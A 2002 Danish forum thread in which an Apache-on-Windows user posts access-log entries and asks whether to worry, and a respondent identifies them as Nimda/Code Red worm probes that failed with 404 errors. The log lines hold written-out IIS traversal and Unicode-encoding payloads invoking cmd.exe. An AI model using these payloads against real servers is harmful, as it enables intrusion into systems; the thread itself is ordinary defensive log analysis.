Avatar billede taskmgr Nybegynder
01. april 2002 - 04:54 Der er 18 kommentarer og
1 løsning

Kig i min log :)

Hejsa

Jeg kører en Apache webserver på min win2k, og jeg undrer mig over denne del af loggen, dukker op sommetider:

131.164.204.170 - - [01/Apr/2002:04:48:21 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 -
131.164.204.170 - - [01/Apr/2002:04:48:28 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 -
131.164.204.170 - - [01/Apr/2002:04:48:34 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
131.164.204.170 - - [01/Apr/2002:04:48:40 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
131.164.204.170 - - [01/Apr/2002:04:48:46 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
131.164.204.170 - - [01/Apr/2002:04:48:52 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
131.164.204.170 - - [01/Apr/2002:04:48:58 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
131.164.204.170 - - [01/Apr/2002:04:49:05 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
131.164.204.170 - - [01/Apr/2002:04:49:11 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 301
131.164.204.170 - - [01/Apr/2002:04:49:18 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
131.164.204.170 - - [01/Apr/2002:04:49:25 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -


Er det noget jeg skal bekymre mig om?

Og jeg er i det hele taget lidt bange for, om der er mange sikkerhedshuller i serveren...
Avatar billede fuldstop Nybegynder
01. april 2002 - 05:03 #1
Ligner noget nimda eller codered angreb, men tror ikke det har nogle effekt på apache. Virker vist kun på serverer som kører IIS. (Men er sku ikke helt sikker)
Avatar billede fuldstop Nybegynder
01. april 2002 - 05:04 #2
Det er jo heller ikke lykkedes for ormen at få adgang: fejlkode http 404
Avatar billede taskmgr Nybegynder
01. april 2002 - 05:05 #3
...tror lige jeg scanner for virus :)
Avatar billede fuldstop Nybegynder
01. april 2002 - 05:07 #4
nok en god ide'.
Check også lige at når du kører din webside, at der ikke står "hacked by chinese" eller noget i den retning.
Avatar billede taskmgr Nybegynder
01. april 2002 - 05:10 #5
:D det gør jeg så...hehe
Avatar billede fuldstop Nybegynder
01. april 2002 - 05:15 #6
Avatar billede taskmgr Nybegynder
01. april 2002 - 05:19 #7
Ok... jeg tror ik der er sket noget, men hvordan sker det egentlig?
Avatar billede taskmgr Nybegynder
01. april 2002 - 05:20 #8
...at de får mulighed får at "smadre" en server på den måde?
Avatar billede fuldstop Nybegynder
01. april 2002 - 05:23 #9
Ormen kommer fra en anden pc/server som er inficeret, og ligger bare og venter indtil den kan komme i kontakt med en anden pc/server.
Ejerene af de inficered servere er slet ikke klar over de har denne orm.
Avatar billede taskmgr Nybegynder
01. april 2002 - 05:25 #10
Og jeg er sikret, fordi jeg bruger Apache?
Avatar billede fuldstop Nybegynder
01. april 2002 - 05:26 #11
Ja du er sikret mod nimda og codered når du kører apache (du må ikke hænge mig op på det, men det mener jeg).
Avatar billede fuldstop Nybegynder
01. april 2002 - 05:27 #12
F,eks er man ved IIS servere nødt til at hente div. sikkerhedspathes for at serveren afviser disse angreb.
Men som jeg umiddelbart kan se afviser din apache server ormen med fejlkode http 404, så den slet ikke får adgang.
Avatar billede taskmgr Nybegynder
01. april 2002 - 05:53 #13
Ok :)

Ingen vira hos mig...

Giver du et svar?
Avatar billede fuldstop Nybegynder
01. april 2002 - 05:56 #14
alletiders.

Her er ellers en god side med beskrivelse af alle vira, herunder W.32 Nimda og codered.
http://securityresponse.symantec.com/avcenter/vinfodb.html

Tak for point;0)
Avatar billede fuldstop Nybegynder
01. april 2002 - 05:56 #15
upz her er svaret *LOL*
Avatar billede fuldstop Nybegynder
01. april 2002 - 06:05 #16
hmmm mærkeligt, spørgmålet står stadigvæk som åbent ude i "spørgmål oversigt", selv om du har accepteret.
Avatar billede fuldstop Nybegynder
01. april 2002 - 06:06 #17
næææ, ok nu forsvandt det! Er vist ved at være træt!
Avatar billede taskmgr Nybegynder
01. april 2002 - 06:08 #18
Jeg sad også og undrede mig et øjeblik :) ku godt være man skulle til køjs :D
Avatar billede fuldstop Nybegynder
01. april 2002 - 06:10 #19
Har først fri kl 0700, så skal jeg også knalde brikker ;o)
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
Uanset kodesprog, så giver vi dig mulighederne for at udvikle det, du behøver.

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Du kan også logge ind via nedenstående tjenester